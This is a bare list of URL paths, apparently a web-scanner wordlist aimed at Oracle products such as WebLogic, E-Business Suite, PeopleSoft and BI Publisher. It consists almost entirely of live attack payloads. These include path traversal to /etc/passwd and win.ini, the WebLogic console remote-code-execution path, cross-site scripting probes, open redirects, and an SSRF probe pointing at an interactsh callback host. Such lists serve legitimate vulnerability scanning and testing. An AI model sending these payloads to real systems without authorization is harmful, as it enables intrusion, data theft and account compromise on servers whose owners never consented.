/ws_utc/config.do
/console/images/%252e%252e%252fconsole.portal?_nfpb=true&_pageLabel=&handle=com.bea.core.repackaged.springframework.context.support.FileSystemXmlApplicationContext(
/console/login/LoginForm.jsp
/manage/fileDownloader?sec=1
/oam/server/opensso/sessionservice
/oim/afr/xx/remote/ww
/reports/rwservlet/showenv
/reports/rwservlet?report=test.rdf&desformat=html&destype=cache&JOBTYPE=rwurl&URLPARAMETER=file:///
/_async/AsyncResponseService
/console/images/%252e%252e%252fconsole.portal
/OA_HTML/bispgraph.jsp%0D%0A.js?ifn=passwd&ifl=/etc/
/OA_HTML/jsp/bsc/bscpgraph.jsp?ifl=/etc/&ifn=passwd
/cs/career/getSurvey.jsp?fn=../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../etc/passwd
/theme/META-INF/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/etc/passwd
/theme/META-INF/prototype%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%afwindows/win.ini
/resource/file%3a///etc/passwd/
/cs/idcplg?IdcService=GET_SEARCH_RESULTS&ResultTemplate=StandardResults&ResultCount=20&FromPageUrl=/cs/idcplg?IdcService=GET_DYNAMIC_PAGEAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA\
/analytics/saw.dll?bieehome&startPage=1
/analytics/saw.dll?getPreviewImage&previewFilePath=/etc/passwd
/admingui/version/serverTasksGeneral?serverTasksGeneral.GeneralWebserverTabs.TabHref=2
/admingui/version/serverConfigurationsGeneral?serverConfigurationsGeneral.GeneralWebserverTabs.TabHref=4
/OA_HTML/ibeCAcpSSOReg.jsp
/OA_HTML/ibeCRgpPrimaryCreate.jsp
/OA_HTML/ibeCRgpIndividualUser.jsp
/OA_HTML/ibeCRgpPartnerPriCreate.jsp
/sgdadmin/faces/com_sun_web_ui/help/helpwindow.jsp?=&windowTitle=AdministratorHelpWindow></TITLE></HEAD><body><script>alert(1337)</script><!--&>helpFile=concepts.html
/xmlpserver/servlet/adfresource?format=aaaaaaaaaaaaaaa&documentId=..%5C..%5C..%5C..%5C..%5C..%5C..%5C..%5C..%5C..%5C..%5C..%5C..%5C..%5C..%5C..%5C..%5CWindows%5Cwin.ini
/OA_HTML/jtfwrepo.xml
/loyalty_enu/start.swe/%3E%22%3E%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E
/psc/ps/?&cmd=login&languageCd=ENG
/psp/csperf/?&cmd=login&languageCd=ENG
/psp/FMPRD/?&cmd=login&languageCd=ENG
/psp/csprd/?&cmd=login&languageCd=ENG
/psp/hcmprdfp/?&cmd=login&languageCd=ENG
/psp/HRPRODASP/?&cmd=login&languageCd=ENG
/psp/guest/?&cmd=login&languageCd=ENG
/psp/CSPRD_PUB/?&cmd=login&languageCd=ENG
/psp/LHCGWPRD_1/?&cmd=login&languageCd=ENG
/psp/CCHIPRD_2/?&cmd=login&languageCd=ENG
/psp/applyuth/?&cmd=login&languageCd=ENG
/psp/HRPRD/?&cmd=login&languageCd=ENG
/psp/CAREERS/?&cmd=login&languageCd=ENG
/psp/heprod_5/?&cmd=login&languageCd=ENG
/psp/saprod/?&cmd=login&languageCd=ENG
/psp/hr857prd_er/?&cmd=login&languageCd=ENG
/psp/CHUMPRDM/?&cmd=login&languageCd=ENG
/psp/HR92PRD/?&cmd=login&languageCd=ENG
/psp/cangate_1/?&cmd=login&languageCd=ENG
/psp/ihprd/?&cmd=login&languageCd=ENG
/fcgi-bin/echo
/oamfed/idp/soap
/atg/bcc
/saw.dll?bieehome&startPage=1
/dbaas_monitor/login
/em/console/logon/logon
/iPages/i_login.asp
/OperaLogin/Welcome.do
/reports/
/ora/reports/
/oracle/reports/
/cgi-bin/test-cgi
/welcome_webcenter.html
/uddiexplorer/
/OA_HTML/lcmServiceController.jsp
/OA_HTML/cabo/jsps/a.jsp?_t=fredRC&configName=&redirect=%2f%5cexample.com
/plus/OA_HTML/cabo/jsps/a.jsp?_t=fredRC&configName=&redirect=/\example.com
/costModule/faces/javax.faces.resource/web.xml?loc=../WEB-INF
/costModule/faces/javax.faces.resource./WEB-INF/web.xml.jsf?ln=..
/faces/javax.faces.resource/web.xml?loc=../WEB-INF
/faces/javax.faces.resource./WEB-INF/web.xml.jsf?ln=..
/secureader/javax.faces.resource/web.xml?loc=../WEB-INF
/secureader/javax.faces.resource./WEB-INF/web.xml.jsf?ln=..
/myaccount/javax.faces.resource/web.xml?loc=../WEB-INF
/myaccount/javax.faces.resource./WEB-INF/web.xml.jsf?ln=..
/SupportPortlet/faces/javax.faces.resource/web.xml?loc=../WEB-INF
/SupportPortlet/faces/javax.faces.resource./WEB-INF/web.xml.jsf?ln=..
/uddiexplorer/SearchPublicRegistries.jsp?rdoSearch=name&txtSearchname=sdf&txtSearchkey=&txtSearchfor=&selfor=Business+location&btnSubmit=Search&operator=http://{{interactsh-url}}
/OA_HTML/cabo/jsps/a.jsp?_t=fredRC&configName=&redirect=%2f%5cinteract.sh
/bi-security-login/login.jsp?msi=false&redirect=%22%3E%3Cimg/src/onerror%3dalert(document.domain)%3E
/oam/pages/error.jsp?error=javascript%3A%2F%2Axssx%27%22%3E--%3E%3C%2Fnoscript%3E%3C%2Ftitle%3E%3C%2Ftextarea%3E%3C%2Fstyle%3E%3C%2Ftemplate%3E%3C%2Fnoembed%3E%3C%2Fscript%3E%3Cimg%20src%3Dx%20onerror%3Dalert%281%29%2F%2F%3E%2A%2F%3Btop.alert%282%29%2F%2F
/uddiexplorer/SearchPublicRegistries.jsp?rdoSearch=name&txtSearchname=sdf&txtSearchkey=&txtSearchfor=&selfor=Business+location&btnSubmit=Search&operator=http://127.1.1.1:700
/cs/idcplg?IdcService=GET_SEARCH_RESULTS&ResultTemplate=StandardResults&ResultCount=20&FromPageUrl=/cs/idcplg?IdcService=GET_DYNAMIC_PAGEAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
/servlet/Satellite?destpage=%22%3Ch1xxx%3Cscriptalert(1)%3C%2Fscript&pagename=OpenMarket%2FXcelerate%2FUIFramework%2FLoginError
/cgi-bin/printenv
/OA_HTML/bin/sqlnet.log
/OA_HTML/jtfLOVInProcess.jsp%3FAAA%3DAAAAAAAAAA%27%22%3E%3Csvg%2Fonload%3Dalert(
/OA_HTML/oksAutoRenewalHelp.jsp%3Fthanks%3D%27%22%3E%3Csvg%2Fonload%3Dalert(
/OA_HTML/ieuiMeetingErrorDisplay.jsp%3FErrCode%3D%27%22%3E%3Csvg%2Fonload%3Dalert(
